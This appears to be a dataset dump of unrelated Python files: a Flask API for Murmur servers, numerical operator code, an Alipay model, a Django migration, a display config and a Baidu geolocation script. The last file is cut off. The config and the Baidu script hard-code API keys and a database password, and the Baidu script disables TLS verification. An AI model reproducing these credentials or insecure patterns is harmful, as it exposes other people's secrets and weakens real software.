text stringlengths 38 1.54M |
|---|
# Count index pairs whose "i + A[i]" value equals another index's "j - A[j]"
# value (equivalently: pairs with j - i == A[i] + A[j]).
from collections import Counter

N = int(input())
A = list(map(int, input().split()))

# plus[v]:  how many indices i have i + A[i] == v
# minus[v]: how many indices j have j - A[j] == v
plus = Counter(i + A[i] for i in range(N))
minus = Counter(i - A[i] for i in range(N))

# Every value present in both maps contributes plus[v] * minus[v] pairs.
result = sum(plus[v] * minus[v] for v in plus.keys() & minus.keys())
print(result)
|
import numpy as np
import scipy.io as io

# Parameter names; each has a '<name>_data.mat' file holding a matrix under
# the same key (assumed at least 5 rows x 5 columns -- TODO confirm).
params = ['Lgrad', 'vc', 'h', 'm', 'rou']
for name in params:  # iterate the list directly instead of range(5)
    theta = io.loadmat(name + '_data.mat')[name]
    print(theta)
    out_path = name + '_data_c.mat'
    for j in range(4):
        # Column 1: percent deviation of column 0 from the baseline row 0.
        theta[j + 1, 1] = np.abs(theta[j + 1, 0] - theta[0, 0]) / theta[0, 0] * 100
        # Column 4: spread (col3 - col2) relative to the baseline spread, in percent.
        theta[j + 1, 4] = (theta[j + 1, 3] - theta[j + 1, 2]) / (theta[0, 3] - theta[0, 2]) * 100
    io.savemat(out_path, {name + '_c': theta})
    print(theta)
|
"""
api.py
All API route endpoints
:copyright: (C) 2014 by github.com/alfg.
:license: MIT, see README for more details.
"""
from datetime import timedelta
from flask import request, jsonify, json, Response
from flask.ext.classy import FlaskView, route
from app import app, meta, auth, auth_enabled, adapter
from app.utils import obj_to_dict, get_server_conf, get_server_port, get_all_users_count, conditional
from app.callbacks import ServerCallback, ServerAuthenticator, MetaCallback
import Murmur
class ServersView(FlaskView):
    """
    Primary interface for creating, reading and writing to mumble servers.

    All handlers return JSON. List-valued responses are serialized manually
    with json.dumps because jsonify() refuses top-level JSON arrays
    (https://github.com/mitsuhiko/flask/issues/170).
    """

    @conditional(auth.login_required, auth_enabled)
    def index(self):
        """
        Lists all servers
        """
        servers = []
        for s in meta.getAllServers():
            servers.append({
                'id': s.id(),
                'name': get_server_conf(meta, s, 'registername'),
                'address': '%s:%s' % (
                    get_server_conf(meta, s, 'host'),
                    get_server_port(meta, s),
                ),
                'host': get_server_conf(meta, s, 'host'),
                'port': get_server_port(meta, s),
                'running': s.isRunning(),
                # Stopped servers report 0 users/channels instead of querying Ice.
                'users': (s.isRunning() and len(s.getUsers())) or 0,
                'maxusers': get_server_conf(meta, s, 'users') or 0,
                'channels': (s.isRunning() and len(s.getChannels())) or 0,
                'uptime_seconds': s.getUptime() if s.isRunning() else 0,
                'uptime': str(
                    timedelta(seconds=s.getUptime()) if s.isRunning() else ''
                ),
                'log_length': s.getLogLen()
            })

        # Workaround response due to jsonify() not allowing top-level json response
        # https://github.com/mitsuhiko/flask/issues/170
        return Response(json.dumps(servers, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    def get(self, id):
        """
        Lists server details
        """
        id = long(id)  # Python-2 `long`; kept as-is (this codebase is py2-only)
        s = meta.getServer(id)

        # Return 404 if not found
        if s is None:
            return jsonify(message="Not Found"), 404

        tree = obj_to_dict(s.getTree()) if s.isRunning() else None

        json_data = {
            'id': s.id(),
            'name': get_server_conf(meta, s, 'registername'),
            'host': get_server_conf(meta, s, 'host'),
            'port': get_server_port(meta, s),
            'address': '%s:%s' % (
                get_server_conf(meta, s, 'host'),
                get_server_port(meta, s),
            ),
            'password': get_server_conf(meta, s, 'password'),
            'welcometext': get_server_conf(meta, s, 'welcometext'),
            'user_count': (s.isRunning() and len(s.getUsers())) or 0,
            'maxusers': get_server_conf(meta, s, 'users') or 0,
            'running': s.isRunning(),
            'uptime': s.getUptime() if s.isRunning() else 0,
            'humanize_uptime': str(
                timedelta(seconds=s.getUptime()) if s.isRunning() else ''
            ),
            'parent_channel': tree['c'] if s.isRunning() else None,
            'sub_channels': tree['children'] if s.isRunning() else None,
            'users': tree['users'] if s.isRunning() else None,
            'registered_users': s.getRegisteredUsers('') if s.isRunning() else None,
            'log_length': s.getLogLen(),
            'bans': s.getBans() if s.isRunning() else 0
        }

        return jsonify(json_data)

    @conditional(auth.login_required, auth_enabled)
    def post(self):
        """
        Creates a server, starts server, and returns id
        """
        # Basic Configuration
        password = request.form.get('password')
        port = request.form.get('port')  # Defaults to inifile+server_id-1
        timeout = request.form.get('timeout')
        bandwidth = request.form.get('bandwidth')
        users = request.form.get('users')
        welcometext = request.form.get('welcometext')

        # Data for registration in the public server list
        registername = request.form.get('registername')
        registerpassword = request.form.get('registerpassword')
        registerhostname = request.form.get('registerhostname')
        registerurl = request.form.get('registerurl')

        # Create server
        server = meta.newServer()

        # Set conf if provided (plain `if` statements replace the previous
        # `expr if cond else None` expression-statements)
        if password:
            server.setConf('password', password)
        if port:
            server.setConf('port', port)
        if timeout:
            server.setConf('timeout', timeout)
        if bandwidth:
            server.setConf('bandwidth', bandwidth)
        if users:
            server.setConf('users', users)
        if welcometext:
            server.setConf('welcometext', welcometext)
        if registername:
            server.setConf('registername', registername)
        # BUG FIX: these three form fields were read but never applied.
        if registerpassword:
            server.setConf('registerpassword', registerpassword)
        if registerhostname:
            server.setConf('registerhostname', registerhostname)
        if registerurl:
            server.setConf('registerurl', registerurl)

        # Start server
        server.start()

        # Format to JSON
        json_data = {
            'id': server.id()
        }

        return jsonify(json_data)

    @conditional(auth.login_required, auth_enabled)
    def delete(self, id):
        """
        Shuts down and deletes a server
        """
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        # Stop server first if it is running
        if server.isRunning():
            server.stop()

        # Delete server instance
        server.delete()
        return jsonify(message="Server deleted")

    ##
    # Nested routes and actions
    ##

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/start', methods=['POST'])
    def start(self, id):
        """ Starts server
        """
        server = meta.getServer(id)

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        # Message if server is already running
        if server.isRunning():
            return jsonify(message="Server already running.")

        # Start server instance
        server.start()
        return jsonify(message="Server started.")

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/stop', methods=['POST'])
    def stop(self, id):
        """ Stops server
        """
        server = meta.getServer(id)

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        # An already-stopped server is reported, not treated as an error
        if not server.isRunning():
            return jsonify(message="Server already stopped.")

        # Stop server instance
        server.stop()
        return jsonify(message="Server stopped.")

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/logs', methods=['GET'])
    def logs(self, id):
        """ Gets all server logs by server ID
        """
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        logs = []
        # getLog(0, -1) fetches the complete log
        for l in server.getLog(0, -1):
            logs.append({
                "message": l.txt,
                "timestamp": l.timestamp,
            })
        return Response(json.dumps(logs, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/user/<user>', methods=['DELETE'])
    def user_del_user(self, id, user):
        """ Deletes user
        """
        server = meta.getServer(int(id))

        # NOTE(review): returns 500 where sibling handlers use 404 -- kept
        # for backward compatibility with existing clients.
        if server is None:
            return jsonify(message="No Server Found for ID "+str(id)), 500

        olduser = server.getRegistration(int(user))
        if olduser is None:
            return jsonify(message="No User Found for ID "+str(user)), 500

        server.unregisterUser(int(user))
        json_data = {
            "user_id": user,
            "deleted": 'Success'
        }
        return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/user', methods=['POST'])
    def user_new_user(self, id):
        """ Creates user
        """
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        username = request.form.get('username')
        password = request.form.get('password')
        new_user = {
            Murmur.UserInfo.UserName: username,
            Murmur.UserInfo.UserPassword: password
        }
        added = server.registerUser(new_user)

        data = obj_to_dict(server.getRegistration(added))
        json_data = {
            "user_id": added,
            "username": data['UserName'],
            "last_active": data['UserLastActive']
        }
        return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/user/<user>', methods=['GET'])
    def register_user(self, id, user):
        """ Gets registered user by ID
        """
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getRegistration(int(user)))
        json_data = {
            "user_id": user,
            "username": data['UserName'],
            "last_active": data['UserLastActive']
        }
        return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/channels', methods=['GET'])
    def channels(self, id):
        """ Gets all channels in server
        """
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getChannels())
        return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/channels/<channel_id>', methods=['GET'])
    def channel(self, id, channel_id):
        """ Gets a single channel in server by channel ID
        """
        # BUG FIX: route params arrive as strings; convert them like the
        # sibling handlers do before calling into Ice.
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getChannelState(int(channel_id)))
        return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/bans', methods=['GET'])
    def bans(self, id):
        """ Gets all banned IPs in server
        """
        # BUG FIX: `<id>` is a string route param; convert before the Ice call.
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getBans())
        return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/conf', methods=['GET'])
    def conf(self, id):
        """ Gets all configuration in server
        """
        server = meta.getServer(id)

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getAllConf())
        return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/conf', methods=['POST'])
    def set_conf(self, id):
        """ Sets a configuration key/value on a server
        """
        key = request.form.get('key')
        value = request.form.get('value')

        if key and value:
            server = meta.getServer(id)

            # Return 404 if not found
            if server is None:
                return jsonify(message="Not Found"), 404

            server.setConf(key, value)
            return jsonify(message="Configuration updated.")
        else:
            return jsonify(message="Configuration key and value required.")

    @conditional(auth.login_required, auth_enabled)
    @route('<id>/channels/<channel_id>/acl', methods=['GET'])
    def channel_acl(self, id, channel_id):
        """ Gets all channel ACLs in server
        """
        # BUG FIX: convert the string route params before the Ice calls.
        server = meta.getServer(int(id))

        # Return 404 if not found
        if server is None:
            return jsonify(message="Not Found"), 404

        data = obj_to_dict(server.getACL(int(channel_id)))
        return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/sendmessage', methods=['POST'])
    def send_message(self, id):
        """ Sends a message to all channels in a server
        """
        message = request.form.get('message')

        if message:
            server = meta.getServer(id)

            # Return 404 if not found
            if server is None:
                return jsonify(message="Not Found"), 404

            # Channel 0 is the root; tree=True cascades to sub-channels.
            server.sendMessageChannel(0, True, message)
            return jsonify(message="Message sent.")
        else:
            return jsonify(message="Message required.")

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/setsuperuserpw', methods=['POST'])
    def set_superuser_pw(self, id):
        """ Sets SuperUser password for server id
        """
        password = request.form.get('password')

        if password:
            server = meta.getServer(id)

            # Return 404 if not found
            if server is None:
                return jsonify(message="Not Found"), 404

            server.setSuperuserPassword(password)
            return jsonify(message="Superuser password set.")
        else:
            return jsonify(message="Password required.")

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/kickuser', methods=['POST'])
    def kick_user(self, id):
        """ Kicks user from server.
        """
        # BUG FIX: int() was applied before checking presence, so a missing
        # `usersession` field crashed with TypeError instead of a message.
        user_session = request.form.get("usersession")  # Session ID of user
        reason = request.form.get("reason", "Reason not defined.")  # Reason messaged for being kicked.

        if user_session:
            server = meta.getServer(id)

            # Return 404 if not found
            if server is None:
                return jsonify(message="Not Found"), 404

            try:
                server.kickUser(int(user_session), reason)
                return jsonify(message="User kicked from server.")
            except Murmur.InvalidSessionException:
                return jsonify(message="Not a valid session ID.")
        else:
            return jsonify(message="User session required.")

    @conditional(auth.login_required, auth_enabled)
    @route('<int:id>/authenticator', methods=['GET'])
    def authenticator(self, id):
        """Some testing

        Attaches a ServerAuthenticator callback to the given server.
        """
        s = meta.getServer(int(id))
        #serverprx = Murmur.ServerCallbackPrx.uncheckedCast(adapter.addWithUUID(ServerCallback(s)))
        #s.addCallback(serverprx)
        s.setAuthenticator(Murmur.ServerAuthenticatorPrx.uncheckedCast(adapter.addWithUUID(ServerAuthenticator(int(id)))))
        return jsonify(message="Callback attached for: "+str(id))
class StatsView(FlaskView):
    """
    View for gathering stats on murmur statistics.
    """

    @conditional(auth.login_required, auth_enabled)
    def index(self):
        """
        Lists all stats
        """
        stats = {
            'all_servers': len(meta.getAllServers()),
            'booted_servers': len(meta.getBootedServers()),
            'users_online': get_all_users_count(meta),
            # getVersion() returns a tuple; element 3 is used as the version
            # here -- presumably the human-readable string, TODO confirm.
            'murmur_version': meta.getVersion()[3],
            'murmur-rest_version': '0.1',
            'uptime': meta.getUptime()
        }

        # Workaround response due to jsonify() not allowing top-level json response
        # https://github.com/mitsuhiko/flask/issues/170
        return Response(json.dumps(stats, sort_keys=True, indent=4), mimetype='application/json')
# Register views with the Flask app (FlaskView derives URL rules from names)
ServersView.register(app)
StatsView.register(app)

# Development entry point; production deployments use a WSGI host instead.
if __name__ == '__main__':
    app.run(debug=True)
|
# Copyright (C) 2010-2016 Dzhelil S. Rufat. All Rights Reserved.
"""
>>> from spexy.grid import Grid_1D
>>> from spexy.grid.grid import hodge_star_matrix
>>> g = Grid_1D.chebnew(3)
>>> H0, H1, H0d, H1d = hodge_star_matrix(g)
>>> H0
array([[ 0.808, 0.058],
[ 0.058, 0.808]])
>>> H1d
array([[ 1.244, -0.089],
[-0.089, 1.244]])
>>> H0d
array([[ 0.411, 0.111, -0.022],
[ 0.056, 0.889, 0.056],
[-0.022, 0.111, 0.411]])
>>> H1
array([[ 2.488, -0.333, 0.179],
[-0.167, 1.167, -0.167],
[ 0.179, -0.333, 2.488]])
>>> g = Grid_1D.chebnew(8)
>>> H0, H1, H0d, H1d = hodge_star_matrix(g)
>>> H0
array([[ 0.134, 0.019, -0.005, 0.002, -0.001, 0. , -0. ],
[ 0.01 , 0.243, 0.026, -0.006, 0.002, -0.001, 0. ],
[-0.002, 0.02 , 0.317, 0.029, -0.005, 0.002, -0. ],
[ 0.001, -0.004, 0.027, 0.343, 0.027, -0.004, 0.001],
[-0. , 0.002, -0.005, 0.029, 0.317, 0.02 , -0.002],
[ 0. , -0.001, 0.002, -0.006, 0.026, 0.243, 0.01 ],
[-0. , 0. , -0.001, 0.002, -0.005, 0.019, 0.134]])
The matrix is a Centrosymmetric matrix
"""
from spexy.ops import nat, num
# Domain endpoints of the 1-D Chebyshev grid.
xmin, xmax = -1, +1
# Backend providing the grid operators ("nat" implementation from spexy.ops).
imp = nat
# Difference operator supplied by the backend.
diff = imp.diff()
# Slices selecting the even / odd entries of an interleaved array.
even = imp.slice_(0, None, 2)
odd = imp.slice_(1, None, 2)
# Sum of the even and odd parts.
evenodd = lambda f: even(f) + odd(f)
# Drops the first and last entries (interior of the array).
mid = imp.slice_(1, -1, None)
def D0(f):
    """Difference of the A00-transformed primal 0-form."""
    averaged = num.A00(f)
    return diff(averaged)
def D1(f):
    # Derivative of a primal 1-form: identically zero (nothing above
    # 1-forms on a 1-D grid).
    return 0
def D0d(f):
    # Derivative of a dual 0-form: plain difference, no pre-transform.
    return diff(f)
def D1d(f):
    # Derivative of a dual 1-form: identically zero on a 1-D grid.
    return 0
def H0d(f):
    """
    Hodge star on dual 0-forms (see module docstring).

    >>> num.mat(H0d, 3)
    array([[ 0.411,  0.111, -0.022],
           [ 0.056,  0.889,  0.056],
           [-0.022,  0.111,  0.411]])
    """
    # Weight, mirror to an extended array, apply the backend Hodge
    # operator, then undo the mirroring -- the order matters.
    f = num.Wd(f)
    f = num.mirror(1, -1)(f)
    f = imp.H(f)
    f = num.unmirror(1)(f)
    return f
def H1(f):
    """
    Hodge star on primal 1-forms (inverse pipeline of H0d).

    >>> num.mat(H1, 3)
    array([[ 2.488, -0.333,  0.179],
           [-0.167,  1.167, -0.167],
           [ 0.179, -0.333,  2.488]])
    """
    # Mirror, apply the inverse backend Hodge operator, unmirror, then
    # remove the dual weighting.
    f = num.mirror(1, -1)(f)
    f = imp.Hinv(f)
    f = num.unmirror(1)(f)
    f = num.Wdinv(f)
    return f
def H0(f):
    """
    Hodge star on primal 0-forms.

    >>> num.mat(H0, 2)
    array([[ 0.808,  0.058],
           [ 0.058,  0.808]])
    """
    # A00 transform and primal weighting, then the mirrored Hodge
    # application; mid() strips the boundary entries at the end.
    f = num.A00(f)
    f = num.W(f)
    f = num.mirror(0, -1)(f)
    f = imp.H(f)
    f = num.unmirror(0)(f)
    f = mid(f)
    return f
def H1d(f):
    """
    Hodge star on dual 1-forms (inverse pipeline of H0).

    >>> num.mat(H1d, 2)
    array([[ 1.244, -0.089],
           [-0.089,  1.244]])
    """
    # A00 transform, mirrored inverse Hodge, remove primal weighting,
    # then strip the boundary entries.
    f = num.A00(f)
    f = num.mirror(0, -1)(f)
    f = imp.Hinv(f)
    f = num.unmirror(0)(f)
    f = num.Winv(f)
    f = mid(f)
    return f
def S(f):
    """
    Shift/interpolation operator (presumably dual -> primal vertices,
    mirroring Sinv below -- TODO confirm).

    >>> num.mat(S, 1)
    array([[ 1.],
           [ 1.]])
    >>> num.mat(S, 2)
    array([[ 1.366, -0.366],
           [ 0.5  ,  0.5  ],
           [-0.366,  1.366]])
    """
    # Abb transform, even mirror extension, backend shift, unmirror.
    f = num.Abb(f)
    f = num.mirror(0, +1)(f)
    f = imp.S(f)
    f = num.unmirror(1)(f)
    return f
def Sinv(f):
    """
    Interpolate from primal to dual vertices.

    >>> from spexy.grid import Grid_1D
    >>> from spexy.grid.grid import switch_matrix
    >>> switch_matrix(Grid_1D.chebnew(2))[0]
    array([[ 1.],
           [ 1.]])
    >>> num.mat(Sinv, 2)
    array([[ 0.5,  0.5]])
    >>> switch_matrix(Grid_1D.chebnew(3))[0]
    array([[ 1.366, -0.366],
           [ 0.5  ,  0.5  ],
           [-0.366,  1.366]])
    >>> num.mat(Sinv, 3)
    array([[ 0.455,  0.667, -0.122],
           [-0.122,  0.667,  0.455]])
    """
    # Even mirror extension, backend inverse shift, unmirror, then strip
    # the boundary entries.
    f = num.mirror(1, +1)(f)
    f = imp.Sinv(f)
    f = num.unmirror(0)(f)
    f = mid(f)
    return f
def Pup0(f):
    """Upsample a primal 0-form by interleaving S(f) with f."""
    shifted = S(f)
    return imp.weave(shifted, f)
def Pup0d(f):
    """Upsample a dual 0-form by interleaving f with Sinv(f)."""
    interpolated = Sinv(f)
    return imp.weave(f, interpolated)
def Pup1(f):
    """Upsample a primal 1-form via its Hodge image."""
    hodged = H1(f)
    return Pup0d(hodged)
def Pup1d(f):
    """Upsample a dual 1-form via its Hodge image."""
    hodged = H1d(f)
    return Pup0(hodged)
def Q(f):
    """
    >>> num.mat(Q, 1)
    array([[ 1.],
           [ 1.]])
    >>> num.mat(Q, 2)
    array([[ 0.625, -0.125],
           [ 0.5  ,  0.5  ],
           [-0.125,  0.625]])
    """
    # Legacy chebyshev-based implementation, kept for reference:
    # f = addbndry(f)
    # f = chebyshev.Q(f)
    # return f
    # Current pipeline: A00 transform, primal weighting, mirrored backend
    # Q operator, unmirror.
    f = num.A00(f)
    f = num.W(f)
    f = num.mirror(0, -1)(f)
    f = imp.Q(f)
    f = num.unmirror(1)(f)
    return f
def Qinv(f):
    """
    >>> num.mat(Qinv, 2)
    array([[ 0.5,  0.5]])
    >>> num.mat(Qinv, 3)
    array([[ 1.   ,  0.667, -0.333],
           [-0.333,  0.667,  1.   ]])
    """
    # Legacy chebyshev-based implementation, kept for reference:
    # f = chebyshev.Qinv(f)
    # f = f[1:-1]
    # return f
    # Current pipeline: mirrored backend inverse-Q, remove weighting,
    # strip boundary entries.
    f = num.mirror(1, -1)(f)
    f = imp.Qinv(f)
    f = num.unmirror(0)(f)
    f = num.Winv(f)
    f = mid(f)
    return f
def Pdown0(f):
    # Downsample a primal 0-form: keep the odd-indexed entries.
    return odd(f)
def Pdown0d(f):
    # Downsample a dual 0-form: keep the even-indexed entries.
    return even(f)
def Pdown1(f):
    """Downsample a primal 1-form: Q transform, then merge even/odd parts."""
    transformed = Q(f)
    return evenodd(transformed)
def Pdown1d(f):
    """Downsample a dual 1-form: interior of Q(f), then merge even/odd parts."""
    interior = mid(Q(f))
    return evenodd(interior)
def G0(f):
    """
    Gradient on primal 0-forms.

    >>> num.mat(G0, 3)
    array([[-2.121,  2.828, -0.707],
           [-0.707, -0.   ,  0.707],
           [ 0.707, -2.828,  2.121]])
    """
    # Abb transform, even mirror, gradient, unmirror, remove weighting,
    # then strip the boundary entries.
    f = num.Abb(f)
    f = num.mirror(0, +1)(f)
    f = num.G(f)
    f = num.unmirror(0)(f)
    f = num.Winv(f)
    f = mid(f)
    return f
def G0d(f):
    """
    Gradient on dual 0-forms.

    >>> num.mat(G0d, 2)
    array([[-0.707,  0.707],
           [-0.707,  0.707]])
    """
    # Even mirror, gradient, unmirror, then remove the dual weighting.
    f = num.mirror(1, +1)(f)
    f = num.G(f)
    f = num.unmirror(1)(f)
    f = num.Wdinv(f)
    return f
# Operator tables: row 0 holds the primal operators, row 1 the dual ones;
# within a row, entries are ordered by form degree (0-forms, 1-forms).
# Presumably consumed by the Grid_1D machinery -- TODO confirm.
derivative = (
    (D0, D1),
    (D0d, D1d),
)

hodge_star = (
    (H0, H1),
    (H0d, H1d),
)

upsample = (
    (Pup0, Pup1),
    (Pup0d, Pup1d),
)

downsample = (
    (Pdown0, Pdown1),
    (Pdown0d, Pdown1d),
)

# 1-forms have no gradient here, hence the None placeholders.
gradient = (
    (G0, None),
    (G0d, None),
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceTransportCarbonDataQueryModel(object):
    """Request model for the transport carbon-data query API.

    Fields are exposed through plain pass-through properties; unset (falsy)
    fields are omitted from the serialized dict, matching the other
    generated Alipay models.
    """

    # Serialization order of the fields (also the attribute names).
    _FIELDS = (
        'biz_date_end',
        'biz_date_start',
        'biz_scene',
        'city_code',
        'open_id',
        'user_id',
    )

    def __init__(self):
        # Every field starts unset (None).
        for name in self._FIELDS:
            setattr(self, '_' + name, None)

    @property
    def biz_date_end(self):
        return self._biz_date_end

    @biz_date_end.setter
    def biz_date_end(self, value):
        self._biz_date_end = value

    @property
    def biz_date_start(self):
        return self._biz_date_start

    @biz_date_start.setter
    def biz_date_start(self, value):
        self._biz_date_start = value

    @property
    def biz_scene(self):
        return self._biz_scene

    @biz_scene.setter
    def biz_scene(self, value):
        self._biz_scene = value

    @property
    def city_code(self):
        return self._city_code

    @city_code.setter
    def city_code(self, value):
        self._city_code = value

    @property
    def open_id(self):
        return self._open_id

    @open_id.setter
    def open_id(self, value):
        self._open_id = value

    @property
    def user_id(self):
        return self._user_id

    @user_id.setter
    def user_id(self, value):
        self._user_id = value

    def to_alipay_dict(self):
        """Serialize the set (truthy) fields into a plain dict,
        recursing into values that are themselves Alipay models."""
        params = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if not value:
                continue  # unset/falsy fields are omitted
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for falsy input."""
        if not d:
            return None
        o = AlipayCommerceTransportCarbonDataQueryModel()
        for name in AlipayCommerceTransportCarbonDataQueryModel._FIELDS:
            if name in d:
                setattr(o, name, d[name])
        return o
|
import logging

# Messages
STARTUP_MSG = u"pydKeg\nStarting"
STARTUP_LOGMSG = u"pydKeg Starting"

# Display Parameters
DISPLAY_DRIVER='winstar_weg'
DISPLAY_WIDTH = 100 # the width of the display
DISPLAY_HEIGHT = 16 # the height of the display
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
#DISPLAY_WIDTH = 20 # the character width of the display
#DISPLAY_HEIGHT = 4 # the number of lines on the display
# GPIO pin assignments for the display (BCM numbering assumed -- TODO confirm)
DISPLAY_PIN_RS = 8
DISPLAY_PIN_E = 7
DISPLAY_PINS_DATA = [ 12, 16, 20, 21 ] # Raspdac V2

# DB Server Parameters
# NOTE(review): hard-coded credentials; consider moving PASSWORD out of
# source control.
SERVER='pydKeg-tap1.local'
PASSWORD='beertime'
PORT=3306

# Tap Number
TAP=1

# Page Parameters
SCROLL_BLANK_WIDTH = 10 # Number of spaces to insert into string that is scrolling
COOLING_PERIOD = 15 # Default amount of time in seconds before an alert message can be redisplayed
HESITATION_TIME = 2.5 # Amount of time in seconds to hesistate before scrolling
ANIMATION_SMOOTHING = .01 # Amount of time in seconds before repainting display

# System Parameters
# This is where the log file will be written
LOGFILE=u'/var/log/pydKeg.log'
#LOGFILE=u'./log/pydKeg.log'
STATUSLOGFILE=u'/var/log/pydKeg-status.log'
#STATUSLOGFILE=u'./log/pydKeg-Status.log'
STATUSLOGGING = False

# Logging level
LOGLEVEL=logging.DEBUG
#LOGLEVEL=logging.INFO
#LOGLEVEL=logging.WARNING
#LOGLEVEL=logging.CRITICAL

# Localization Parameters
# Adjust this setting to localize the time display to your region
TIMEZONE=u"US/Eastern"
TIME24HOUR=False
#TIMEZONE=u"Europe/Paris"
# Adjust this setting to localize temperature displays
TEMPERATURE=u'fahrenheit'
#TEMPERATURE=u'celsius'

# WEATHER Parameters
# You must get your own API key from http://openweathermap.org/appid
# NOTE(review): an API key is committed here; it should be rotated and
# supplied via configuration instead.
OWM_API = u'52dfe63ba1fd89b1eda781a02d456842'
# NOVA Metro area. Replace with your location.
OWM_LAT = 38.86
OWM_LON = -77.34
# NY Metro area. Replace with your location.
#OWM_LAT = 40.72
#OWM_LON = -74.07
|
import requests
import json
def login(account):
    """POST to the Baidu IP-geolocation API and return the unescaped body.

    account: dict with 'ip' (empty = locate the caller), 'ak' (API key)
    and 'coor' (coordinate system) entries.
    """
    endpoint = 'https://api.map.baidu.com/location/ip'
    payload = {
        "ip": account["ip"],
        "ak": account["ak"],
        "coor": account["coor"],
    }
    # form_data = {"ip": "101.247.112.18", "ak": 'dntnIGs3ueWbi8TGkGYz0l8j1p6c9Yc1', "coor": "bd09ll"}
    print(payload)
    request_headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    }
    # NOTE(review): verify=False disables TLS certificate checking --
    # confirm this is intentional before use outside testing.
    reply = requests.post(url=endpoint, headers=request_headers, data=payload, verify=False)
    # The API returns \uXXXX-escaped text; unescape it for readable output.
    return reply.text.encode('utf-8').decode('unicode_escape')
# Build the request parameters; an empty 'ip' asks the API to locate the
# caller's own IP address.
account=dict()
account['ip']=''
account['ak']='dntnIGs3ueWbi8TGkGYz0l8j1p6c9Yc1'
account['coor']='bd09ll'
t=login(account)
print(t)
#{"status":0,"data":{"user_id":4,"token":"8727cb46-81dc-4719-b043-bb76532171fc"}}
|
# Generated by Django 2.1.4 on 2018-12-28 19:27
from django.db import migrations, models
class Migration(migrations.Migration):
    # Re-adds the integer preperation_time field removed in 0002.
    # Note: the field name keeps the "preperation" spelling used elsewhere
    # in the app -- do not "fix" it in a migration.

    dependencies = [
        ('meals', '0002_remove_meals_preperation_time'),
    ]

    operations = [
        migrations.AddField(
            model_name='meals',
            name='preperation_time',
            # default=20 backfills existing rows; preserve_default=False
            # drops the default from the field definition afterwards.
            field=models.IntegerField(default=20),
            preserve_default=False,
        ),
    ]
|
# -*- coding: utf-8 -*-
# Copyright (C) 2008 Murphy Lab
# Carnegie Mellon University
#
# Written by Luis Pedro Coelho <lpc@cmu.edu>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 2 of the License,
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
# For additional information visit http://murphylab.web.cmu.edu or
# send email to murphy@cmu.edu
from __future__ import division
import numpy
from scipy import ndimage
from mahotas.morph import majority_filter
from .thresholding import otsu, rc, murphy_rc
def nonzeromin(img):
    '''
    Returns the minimum non zero element in img.

    Assumes img has no negative values; returns 0 if every element is zero.
    '''
    # BUG FIX: was `A = A.copy().ravel()`, a NameError (and used the
    # undefined name `np` below; this module imports `numpy`).
    A = img.copy().ravel()
    A.sort()
    if A[-1] == 0:
        return 0
    # First element strictly greater than zero. Searching for 0 with
    # side='right' (instead of searching for 1) also handles fractional
    # pixel values correctly.
    pos = A.searchsorted(0, side='right')
    return A[pos]
def mean_filter(img, size=3):
    '''
    meanimg = mean_filter(img, size=3)

    computes
